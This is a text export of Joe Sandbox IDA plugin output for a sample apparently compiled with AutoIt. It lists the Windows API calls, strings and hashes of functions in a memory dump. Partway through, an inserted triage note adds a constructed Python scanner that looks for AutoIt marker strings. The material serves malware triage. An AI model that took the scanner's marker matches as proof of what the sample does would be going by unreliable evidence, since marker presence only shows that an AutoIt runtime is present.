                                          • _memset.LIBCMT ref: 000C5787
                                          • _wcscpy.LIBCMT ref: 000C57DB
                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 000C57EB
                                          • __swprintf.LIBCMT ref: 00100CD1
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: IconLoadNotifyShell_String__swprintf_memmove_memset_wcscpy
                                          • String ID: Line %d: $AutoIt -
                                          • API String ID: 230667853-4094128768
                                          • Opcode ID: 1cadbb0f0705499740fd5538dd58ce8d10e1e79dd774ef876b86df49860127a8
                                          • Instruction ID: 0e5dea909fe04ebf0f04a3af1464cfe757adf1c8a0e62854cd1c074a2155165f
                                          • Opcode Fuzzy Hash: 1cadbb0f0705499740fd5538dd58ce8d10e1e79dd774ef876b86df49860127a8
                                          • Instruction Fuzzy Hash: 27418071408304AAD322EB60DC85FDF77ECAF59350F00062EF199921A3EB70A689C792

                                          Control-flow Graph
                                          • Function 000C50DB-000C514B: CreateWindowExW * 2, ShowWindow * 2 (graph rendering and executed/not-executed colouring not recoverable from text)
                                          APIs
                                          • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 000C5109
                                          • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 000C512A
                                          • ShowWindow.USER32(00000000), ref: 000C513E
                                          • ShowWindow.USER32(00000000), ref: 000C5147
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Window$CreateShow
                                          • String ID: AutoIt v3$edit
                                          • API String ID: 1584632944-3779509399
                                          • Opcode ID: 848d0f87d9b7b54b0cbafddd2bf5eb98ba719f9694852fdc6358df3805e81d7c
                                          • Instruction ID: 5d48e456841b2e45773731bbb6615c5a74b6977080c62458dca4a7b10d055bbc
                                          • Opcode Fuzzy Hash: 848d0f87d9b7b54b0cbafddd2bf5eb98ba719f9694852fdc6358df3805e81d7c
                                          • Instruction Fuzzy Hash: C4F017705442907AEA222723AC08E273E7DE7CAF10F01002EBA18A26B2C67118C0CAB0

                                          Control-flow Graph
                                          • Function 00119B16-00119CEE: calls 000C4A8C, 00119CF1, 000C4AB2, 000D593C, 001196C4, 00118F0E, 001190C1, 000D2F85 (graph rendering and executed/not-executed colouring not recoverable from text)
                                          APIs
                                            • Part of subcall function 000C4A8C: _fseek.LIBCMT ref: 000C4AA4
                                            • Part of subcall function 00119CF1: _wcscmp.LIBCMT ref: 00119DE1
                                            • Part of subcall function 00119CF1: _wcscmp.LIBCMT ref: 00119DF4
                                          • _free.LIBCMT ref: 00119C5F
                                          • _free.LIBCMT ref: 00119C66
                                          • _free.LIBCMT ref: 00119CD1
                                            • Part of subcall function 000D2F85: RtlFreeHeap.NTDLL(00000000,00000000,?,000D9C54,00000000,000D8D5D,000D59C3), ref: 000D2F99
                                            • Part of subcall function 000D2F85: GetLastError.KERNEL32(00000000,?,000D9C54,00000000,000D8D5D,000D59C3), ref: 000D2FAB
                                          • _free.LIBCMT ref: 00119CD9
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                          • String ID: >>>AUTOIT SCRIPT<<<
                                          • API String ID: 1552873950-2806939583
                                          • Opcode ID: bea6cfab99f27b604f129238a6b40d9f172b21d7b16cda8946752e50d6810ce1
                                          • Instruction ID: ed48b4ae93c48ed083d7e7d1ff91be4e03b36444a068a8801cec0ed34b9fe3ad
                                          • Opcode Fuzzy Hash: bea6cfab99f27b604f129238a6b40d9f172b21d7b16cda8946752e50d6810ce1
                                          • Instruction Fuzzy Hash: BA512CB1904219ABDF289F64DC51BDEBBB9FF48304F0004AEB659A3341DB715A808F59

                                          Control-flow Graph
                                          • Function 000D563D-000D5800: no direct API calls; calls 000D8D58, 000D8FE6, 000D3010, 000E0DD7, 000E0EF8, 000D4906, 000E108B (graph rendering and executed/not-executed colouring not recoverable from text)
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                          • String ID:
                                          • API String ID: 1559183368-0
                                          • Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                          • Instruction ID: 359a20cdb91b5fd2c9d41ef007e5dddcea010796fe2a7d9b8186742eef747eab
                                          • Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                          • Instruction Fuzzy Hash: 71518D30A04B05DBDB248EA99C846AEBBA5AF40326F34876BFC25973D1D770DD508B60

                                          Control-flow Graph
                                          • Function 000B52B0-000B5374 with an outlined chunk at 000EDF28-000EDFBC: PeekMessageW * 2, TranslateMessage, DispatchMessageW, TranslateAcceleratorW; calls 000B359E (graph rendering and executed/not-executed colouring not recoverable from text)
                                          APIs
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000B52E6
                                          • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 000B534A
                                          • TranslateMessage.USER32(?), ref: 000B5356
                                          • DispatchMessageW.USER32(?), ref: 000B5360
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Message$Peek$DispatchTranslate
                                          • String ID:
                                          • API String ID: 1795658109-0
                                          • Opcode ID: b041667da8d60745c44aca79b135c26f3394cf4ac7fdca43169d2dfe8c2c4e50
                                          • Instruction ID: ccd0de85437b80f634a5cdf189ec3fa07e07b54f15ef7627c4907cadebc67bee
                                          • Opcode Fuzzy Hash: b041667da8d60745c44aca79b135c26f3394cf4ac7fdca43169d2dfe8c2c4e50
                                          • Instruction Fuzzy Hash: F031F230508B469EEB70CB64DC48BFA37F89B06741F2400AAE526A66E1D7B199C5E711
                                          APIs
                                          • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,000B1275,SwapMouseButtons,00000004,?), ref: 000B12A8
                                          • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,000B1275,SwapMouseButtons,00000004,?), ref: 000B12C9
                                          • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,000B1275,SwapMouseButtons,00000004,?), ref: 000B12EB
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CloseOpenQueryValue
                                          • String ID: Control Panel\Mouse
                                          • API String ID: 3677997916-824357125
                                          • Opcode ID: 55330ab7f532a761c073a0b82274d33b920c1c0abcf67c65bc740f35441f69b0
                                          • Instruction ID: 579e05cd345b7700d76c84e119f308bf435e2b1a529e074e131e6485bf6c26fa
                                          • Opcode Fuzzy Hash: 55330ab7f532a761c073a0b82274d33b920c1c0abcf67c65bc740f35441f69b0
                                          • Instruction Fuzzy Hash: 21115775610208BFDB218FA5DC84EEEBBF8EF09740F504569F905D7220E2319E509BA4
                                          APIs
                                          • GetFileAttributesW.KERNEL32(?,00142C4C), ref: 00113F57
                                          • GetLastError.KERNEL32 ref: 00113F66
                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 00113F75
                                          • CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00142C4C), ref: 00113FD2
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: CreateDirectory$AttributesErrorFileLast
                                          • String ID:
                                          • API String ID: 2267087916-0
                                          • Opcode ID: 9352b5db44da13feffee49a5a1aaed4155bb58889be898a549ee7ff7e82b21f3
                                          • Instruction ID: d52d2525373dcbb8e9b4e340b6541411ddffc0a0994fbd8ff49067c75a287e77
                                          • Opcode Fuzzy Hash: 9352b5db44da13feffee49a5a1aaed4155bb58889be898a549ee7ff7e82b21f3
                                          • Instruction Fuzzy Hash: D42171749082129F8604DF28C8859EEB7F8AF5A364F10462DF4A5C72A2D7309A86CB53
                                          APIs
                                          • _memset.LIBCMT ref: 000C5B58
                                            • Part of subcall function 000C56F8: _memset.LIBCMT ref: 000C5787
                                            • Part of subcall function 000C56F8: _wcscpy.LIBCMT ref: 000C57DB
                                            • Part of subcall function 000C56F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 000C57EB
                                          • KillTimer.USER32(?,00000001,?,?), ref: 000C5BAD
                                          • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 000C5BBC
                                          • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00100D7C
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                          • String ID:
                                          • API String ID: 1378193009-0
                                          • Opcode ID: 3acbb43137191f7701449e98380af03f0810d33869f0c78e49b4ae4e83764b42
                                          • Instruction ID: 3ac0681c76b2058f232dbe7a7daaadb855396ead2988f99d8e95a9f6f9039d57
                                          • Opcode Fuzzy Hash: 3acbb43137191f7701449e98380af03f0810d33869f0c78e49b4ae4e83764b42
                                          • Instruction Fuzzy Hash: 5521B374504B849FE7738B648C95FEABFECAB09305F04048DE6DA56282C7B439C4DB51
                                          APIs
                                            • Part of subcall function 000C49C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,000C27AF,?,00000001), ref: 000C49F4
                                          • _free.LIBCMT ref: 000FFB04
                                          • _free.LIBCMT ref: 000FFB4B
                                            • Part of subcall function 000C29BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 000C2ADF
                                          Strings
                                          • Bad directive syntax error, xrefs: 000FFB33
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: _free$CurrentDirectoryLibraryLoad
                                          • String ID: Bad directive syntax error
                                          • API String ID: 2861923089-2118420937
                                          • Opcode ID: 5ea66aea755580d61661e69cddaa5161103f63c38e68885330dbad29626d0a97
                                          • Instruction ID: 95bc19183ae9ed83b9badd2256c262b01c6c14252d87633b792626deee124215
                                          • Opcode Fuzzy Hash: 5ea66aea755580d61661e69cddaa5161103f63c38e68885330dbad29626d0a97
                                          • Instruction Fuzzy Hash: 66919D7191421EAFCF14EFA4C891AFDB7B4FF19310F10442AF916AB6A2DB709A05DB50
                                          APIs
                                            • Part of subcall function 000C4AB2: __fread_nolock.LIBCMT ref: 000C4AD0
                                          • _wcscmp.LIBCMT ref: 00119DE1
                                          • _wcscmp.LIBCMT ref: 00119DF4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: _wcscmp$__fread_nolock
                                          • String ID: FILE
                                          • API String ID: 4029003684-3121273764
                                          • Opcode ID: a808084220c446af0b440bcef6d62e0f395f1d70d5f2254da3ce3ddc4f5ec767
                                          • Instruction ID: 9a33689fc69c81c4efc85baaec569fd114238380eb719ea78f07fa79ec37885f
                                          • Opcode Fuzzy Hash: a808084220c446af0b440bcef6d62e0f395f1d70d5f2254da3ce3ddc4f5ec767
                                          • Instruction Fuzzy Hash: EB41E572A40209BADF249BA4CC55FEF77BDEF45710F00047AF910A7281D77199448B65
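                                          Triage note. The listing above (String ID "FILE", with __fread_nolock and two _wcscmp calls) and the earlier listing at 00119B16 (String ID ">>>AUTOIT SCRIPT<<<", with _fseek and the same _wcscmp pair) pair file reads with string comparisons against those markers, which is consistent with an AutoIt runtime locating its embedded script. The scanner below is an added example, not Joe Sandbox output and not code from file.exe: it searches a binary for the UTF-16LE forms of the strings this report lists ("AutoIt v3", ">>>AUTOIT SCRIPT<<<", "FILE", "Line %d: $AutoIt -") and reports their offsets. The function names, the role given to each marker and the sample bytes are this example's own assumptions; the sample is a constructed MZ/PE stub, not bytes from file.exe.

```python
"""Triage scanner for AutoIt-compiled PE files.

Added example, not Joe Sandbox output and not code from file.exe. It looks for
the UTF-16LE strings the report lists as _wcscmp operands and window/format
strings, and reports their offsets. Function names and the sample bytes are
this example's own; the sample is a constructed MZ/PE stub, not file.exe.
"""
from __future__ import annotations

# Strings copied from the report's String ID fields; the role names are assumed.
MARKERS = {
    "window_class": "AutoIt v3",
    "script_resource": ">>>AUTOIT SCRIPT<<<",
    "resource_tag": "FILE",
    "error_format": "Line %d: $AutoIt -",
}


def find_utf16le(data: bytes, text: str) -> list[int]:
    """Return every byte offset at which `text` appears encoded as UTF-16LE."""
    needle = text.encode("utf-16-le")
    hits: list[int] = []
    start = 0
    while (pos := data.find(needle, start)) != -1:
        hits.append(pos)
        start = pos + 2  # advance one UTF-16 code unit before searching again
    return hits


def is_pe(data: bytes) -> bool:
    """Cheap MZ/PE check: 'MZ' at offset 0 and e_lfanew (0x3C) pointing at the PE signature."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = int.from_bytes(data[0x3C:0x40], "little")
    return data[e_lfanew:e_lfanew + 4] == b"PE\0\0"


def triage(data: bytes) -> dict:
    """Scan for all markers; the verdict needs two of the three long markers.

    "FILE" is four characters and is deliberately left out of the verdict: it is
    too short to be more than corroborating evidence, so it is reported only.
    """
    hits = {name: find_utf16le(data, text) for name, text in MARKERS.items()}
    strong = [k for k in ("window_class", "script_resource", "error_format") if hits[k]]
    return {"pe": is_pe(data), "hits": hits, "likely_autoit": len(strong) >= 2}


def build_sample() -> bytes:
    """Constructed stand-in for a compiled AutoIt binary (not bytes from file.exe)."""
    hdr = bytearray(0x44)
    hdr[:2] = b"MZ"
    hdr[0x3C:0x40] = (0x40).to_bytes(4, "little")  # e_lfanew -> 0x40
    hdr[0x40:0x44] = b"PE\0\0"
    body = b"\x00" * 16 + "AutoIt v3".encode("utf-16-le") + b"\x00\x00"
    body += "FILE".encode("utf-16-le") + ">>>AUTOIT SCRIPT<<<".encode("utf-16-le")
    body += b"\x00" * 8 + "Line %d: $AutoIt -".encode("utf-16-le")
    return bytes(hdr) + body


if __name__ == "__main__":
    import sys
    blob = open(sys.argv[1], "rb").read() if len(sys.argv) > 1 else build_sample()
    result = triage(blob)
    print("PE:", result["pe"], "likely AutoIt:", result["likely_autoit"])
    for name, offsets in result["hits"].items():
        print(f"  {name:16s} {[hex(o) for o in offsets]}")
```

Run it with a file path to scan a real sample, or without arguments to scan the constructed stub. Marker presence only says the binary carries an AutoIt runtime; it says nothing about the embedded script, which still has to be extracted and read.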
                                          APIs
                                          • _memset.LIBCMT ref: 0010032B
                                          • GetOpenFileNameW.COMDLG32(?), ref: 00100375
                                            • Part of subcall function 000D0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,000C2A58,?,00008000), ref: 000D02A4
                                            • Part of subcall function 000D09C5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 000D09E4
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_10_2_b0000_Beginners.jbxd
                                          Similarity
                                          • API ID: Name$Path$FileFullLongOpen_memset
                                          • String ID: X
                                          • API String ID: 3777226403-3081909835
                                          • Opcode ID: 7db2851ab4f7e4b8c97458794d0b84a7030d3b3bc2c355bc06bea3238deb05ac
                                          • Instruction ID: 443dae224c4443ab1d5d4123d3938835db8d20d7b01ccb9f9fcf2f8f5b8049dd
                                          • Opcode Fuzzy Hash: 7db2851ab4f7e4b8c97458794d0b84a7030d3b3bc2c355bc06bea3238deb05ac
                                          • Instruction Fuzzy Hash: 74219371A142989FDF51DF98C845BEE7BF8AF49310F00405AE408B7282DBB55A89CFA1
                                          Memory Dump Source
                                          • Source File: 0000000A.00000002.3506626140.00000000000B1000.00000020.00000001.01000000.00000006.sdmp, Offset: 000B0000, based on PE: true
                                          • Associated: 0000000A.00000002.3506605006.00000000000B0000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000140000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506692399.0000000000166000.00000002.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506745434.0000000000170000.00000004.00000001.01000000.00000006.sdmp
                                          • Associated: 0000000A.00000002.3506766523.0000000000179000.00000002.00000001.01000000.00000006.sdmp
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 56c5ac41d737a64bf6d0f75de1ca65d2694865093851072aa16ab8a97f961ae8
                                          • Instruction ID: 44d43126a90de706557a540bf7664d90b055556b5fba0b18c6fc7e50296ac9cf
                                          • Opcode Fuzzy Hash: 56c5ac41d737a64bf6d0f75de1ca65d2694865093851072aa16ab8a97f961ae8
                                          • Instruction Fuzzy Hash: 3DF149706083519FC714DF28E484A6ABBE5FF88314F14892EF8999B352DB70E955CF82
                                          APIs
                                          • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 000BAD08
                                          • OleInitialize.OLE32(00000000), ref: 000BAD85
                                          Similarity
                                          • API ID: HandleInitialize
                                          • String ID:
                                          • API String ID: 3139323997-0
                                          • Opcode ID: 2be022056335b45339ba0aa975ffdd921cc23f2377349329a368226db50c060a
                                          • Instruction ID: b8c3c9b024c8c39a2e89adf3fd1e8cdb124b975ad1bf769d5ffc995c9231da07
                                          • Opcode Fuzzy Hash: 2be022056335b45339ba0aa975ffdd921cc23f2377349329a368226db50c060a
                                          • Instruction Fuzzy Hash: 3351C1B090C3418EC799DF29AD486557FF5EB59310F1485AAD41EC7AF2E73044C4CB61
                                          APIs
                                          • _memset.LIBCMT ref: 000C59F9
                                          • Shell_NotifyIconW.SHELL32(00000000,?), ref: 000C5A9E
                                          • Shell_NotifyIconW.SHELL32(00000001,?), ref: 000C5ABB
                                          Similarity
                                          • API ID: IconNotifyShell_$_memset
                                          • String ID:
                                          • API String ID: 1505330794-0
                                          • Opcode ID: 1a9d02e3701dcc1931dec66380e894d37dde6d9b49577e32a5b60832153e8b85
                                          • Instruction ID: de5be9261e426db12bd9d145bcbcfae051cdaa565d714a7b2e392f644f1f4639
                                          • Opcode Fuzzy Hash: 1a9d02e3701dcc1931dec66380e894d37dde6d9b49577e32a5b60832153e8b85
                                          • Instruction Fuzzy Hash: 543180B4505B018FC761DF65DC84B9BBBF4FB49305F000A2EF6AA82291E77169C4CB52
                                          APIs
                                          • __FF_MSGBANNER.LIBCMT ref: 000D5953
                                            • Part of subcall function 000DA39B: __NMSG_WRITE.LIBCMT ref: 000DA3C2
                                            • Part of subcall function 000DA39B: __NMSG_WRITE.LIBCMT ref: 000DA3CC
                                          • __NMSG_WRITE.LIBCMT ref: 000D595A
                                            • Part of subcall function 000DA3F8: GetModuleFileNameW.KERNEL32(00000000,001753BA,00000104,00000004,00000001,000D1003), ref: 000DA48A
                                            • Part of subcall function 000DA3F8: ___crtMessageBoxW.LIBCMT ref: 000DA538
                                            • Part of subcall function 000D32CF: ___crtCorExitProcess.LIBCMT ref: 000D32D5
                                            • Part of subcall function 000D32CF: ExitProcess.KERNEL32 ref: 000D32DE
                                            • Part of subcall function 000D8D58: __getptd_noexit.LIBCMT ref: 000D8D58
                                          • RtlAllocateHeap.NTDLL(00BF0000,00000000,00000001,?,00000004,?,?,000D1003,?), ref: 000D597F
                                          Similarity
                                          • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                          • String ID:
                                          • API String ID: 1372826849-0
                                          • Opcode ID: 0da35e9c4695fc5cff7821e0aee0652f35974aababb359c91031e37821fd0f63
                                          • Instruction ID: b426dfd194026340458a539515c939e016420391ff477bee447a742a9041aaf5
                                          • Opcode Fuzzy Hash: 0da35e9c4695fc5cff7821e0aee0652f35974aababb359c91031e37821fd0f63
                                          • Instruction Fuzzy Hash: 2A01F531341B01DAE7512B25AC62AAEB39A8F52772F600027FD189B3D2DEB08D804771
                                          Strings
                                          Similarity
                                          • API ID:
                                          • String ID: CALL
                                          • API String ID: 0-4196123274
                                          • Opcode ID: 9f0d7a7b438516dcd60a59ff86dbb48223249c47bcb2edd07680b794ea5fa0fd
                                          • Instruction ID: a9036a55f806446971cdd86a27aec3309d6921f728ee3c16de5caab8ae9b0e37
                                          • Opcode Fuzzy Hash: 9f0d7a7b438516dcd60a59ff86dbb48223249c47bcb2edd07680b794ea5fa0fd
                                          • Instruction Fuzzy Hash: 26324970508341DFDB24DF14C494BAAB7E1BF84304F19896DE88A9B362D776ED85CB82
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: _memmove
                                          • String ID: EA06
                                          • API String ID: 4104443479-3962188686
                                          • Opcode ID: 1f8544afdc70d2d5571eeee00f93a6e27a6e94d8f40776d071cf7528aed13444
                                          • Instruction ID: 5ffdaf055152db0d7d62888a298727ded24331aa0ff0f4e2c904b53beb498976
                                          • Opcode Fuzzy Hash: 1f8544afdc70d2d5571eeee00f93a6e27a6e94d8f40776d071cf7528aed13444
                                          • Instruction Fuzzy Hash: B1413B31E041685BDF329B548861BFF7BA5FB55310F648079F8C6A7287D6718D8483E2
                                          APIs
                                          • _strcat.LIBCMT ref: 0012E20C
                                            • Part of subcall function 000B4D37: __itow.LIBCMT ref: 000B4D62
                                            • Part of subcall function 000B4D37: __swprintf.LIBCMT ref: 000B4DAC
                                          • _wcscpy.LIBCMT ref: 0012E29B
                                          Similarity
                                          • API ID: __itow__swprintf_strcat_wcscpy
                                          • String ID:
                                          • API String ID: 1012013722-0
                                          • Opcode ID: ed6f580dfebcb723fbbfb84c1652d42a56f29431a2c15acb675941f1643a8df8
                                          • Instruction ID: a16d9d11e26da3e6bd21d31969e1e892be087ffa591e562cfd4add11a109be88
                                          • Opcode Fuzzy Hash: ed6f580dfebcb723fbbfb84c1652d42a56f29431a2c15acb675941f1643a8df8
                                          • Instruction Fuzzy Hash: 72915735A00614DFCB18EF18D4819A9B7F5FF59311B5580AAE80A8F3A2DB30EE11CB90
                                          APIs
                                          Similarity
                                          • API ID: CloseCreateHandleProcess
                                          • String ID:
